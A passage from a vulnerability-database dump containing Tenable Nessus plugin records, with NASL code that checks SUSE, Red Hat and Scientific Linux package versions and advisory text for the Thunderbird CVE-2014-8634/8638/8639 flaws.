value:\"p-cpe:/a:novell:suse_linux:libsoftokn3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsoftokn3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsoftokn3-hmac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-certs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-certs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"MozillaFirefox-31.4.0esr-20.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"MozillaFirefox-debuginfo-31.4.0esr-20.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"MozillaFirefox-debugsource-31.4.0esr-20.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"MozillaFirefox-translations-31.4.0esr-20.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libfreebl3-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libfreebl3-debuginfo-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libfreebl3-hmac-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsoftokn3-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsoftokn3-debuginfo-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsoftokn3-hmac-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-certs-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-certs-debuginfo-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-debuginfo-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-debugsource-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-tools-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-tools-debuginfo-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libfreebl3-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libfreebl3-debuginfo-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libfreebl3-hmac-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsoftokn3-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsoftokn3-debuginfo-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsoftokn3-hmac-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-certs-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-certs-debuginfo-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mozilla-nss-debuginfo-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"MozillaFirefox-31.4.0esr-20.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"MozillaFirefox-debuginfo-31.4.0esr-20.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"MozillaFirefox-debugsource-31.4.0esr-20.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"MozillaFirefox-translations-31.4.0esr-20.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libfreebl3-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libfreebl3-debuginfo-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libfreebl3-debuginfo-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsoftokn3-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsoftokn3-debuginfo-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsoftokn3-debuginfo-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-debuginfo-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-debuginfo-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-debuginfo-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-debuginfo-32bit-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-debugsource-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-tools-3.17.3-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mozilla-nss-tools-debuginfo-3.17.3-16.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:31", "description": "An updated thunderbird package that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird did not follow the Cross-Origin Resource Sharing (CORS) specification.\nA web page containing malicious content could allow a remote attacker to conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially crafted HTML mail message as JavaScript is disabled by default for mail messages. They could be exploited another way in Thunderbird, for example, when viewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura, and Xiaofeng Zheng as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security advisories for Thunderbird 31.4.0. You can find a link to the Mozilla advisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which contains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the changes to take effect.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : thunderbird (RHSA-2015:0047)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:thunderbird", "p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6"], "id": "REDHAT-RHSA-2015-0047.NASL", "href": "https://www.tenable.com/plugins/nessus/80509", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0047. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80509);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_xref(name:\"RHSA\", value:\"2015:0047\");\n\n script_name(english:\"RHEL 5 / 6 : thunderbird (RHSA-2015:0047)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An updated thunderbird package that fixes three security issues is now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird\ndid not follow the Cross-Origin Resource Sharing (CORS) specification.\nA web page containing malicious content could allow a remote attacker\nto conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially\ncrafted HTML mail message as JavaScript is disabled by default for\nmail messages. They could be exploited another way in Thunderbird, for\nexample, when viewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Christian Holler, Patrick McManus,\nMuneaki Nishimura, and Xiaofeng Zheng as the original reporters of\nthese issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Thunderbird 31.4.0. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the\nchanges to take effect.\"\n );\n # https://www.mozilla.org/security/known-vulnerabilities/thunderbird.html#\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?333aa168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0047\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8638\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8634\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0047\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"thunderbird-31.4.0-1.el5_11\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"thunderbird-31.4.0-1.el5_11\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"thunderbird-debuginfo-31.4.0-1.el5_11\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-31.4.0-1.el5_11\", allowmaj:TRUE)) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"thunderbird-31.4.0-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"thunderbird-31.4.0-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"thunderbird-31.4.0-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"thunderbird-debuginfo-31.4.0-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"thunderbird-debuginfo-31.4.0-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-31.4.0-1.el6_6\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:20", "description": "Two flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird did not follow the Cross-Origin Resource Sharing (CORS) specification.\nA web page containing malicious content could allow a remote attacker to conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially crafted HTML mail message as JavaScript is disabled by default for mail messages. They could be exploited another way in Thunderbird, for example, when viewing the full remote content of an RSS feed.\n\nAfter installing the update, Thunderbird must be restarted for the changes to take effect.", "cvss3": {}, "published": "2015-01-15T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : thunderbird on SL5.x, SL6.x i386/x86_64 (20150113)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:thunderbird", "p-cpe:/a:fermilab:scientific_linux:thunderbird-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150113_THUNDERBIRD_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/80546", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80546);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n\n script_name(english:\"Scientific Linux Security Update : thunderbird on SL5.x, SL6.x i386/x86_64 (20150113)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird\ndid not follow the Cross-Origin Resource Sharing (CORS) specification.\nA web page containing malicious content could allow a remote attacker\nto conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially\ncrafted HTML mail message as JavaScript is disabled by default for\nmail messages. They could be exploited another way in Thunderbird, for\nexample, when viewing the full remote content of an RSS feed.\n\nAfter installing the update, Thunderbird must be restarted for the\nchanges to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1501&L=scientific-linux-errata&T=0&P=1140\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a15f3e34\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"thunderbird-31.4.0-1.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"thunderbird-debuginfo-31.4.0-1.el5_11\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"thunderbird-31.4.0-1.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"thunderbird-debuginfo-31.4.0-1.el6_6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:32", "description": "Christian Holler and Patrick McManus discovered multiple memory safety issues in Thunderbird. If a user were tricked in to opening a specially crafted message with scripting enabled, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Thunderbird. (CVE-2014-8634)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon() lack an origin header. If a user were tricked in to opening a specially crafted message with scripting enabled, an attacker could potentially exploit this to conduct cross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response could inject cookies in to the originally requested domain. If a user connected to a malicious web proxy, an attacker could potentially exploit this to conduct session-fixation attacks. (CVE-2014-8639).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : thunderbird vulnerabilities (USN-2460-1)", "bulletinFamily": 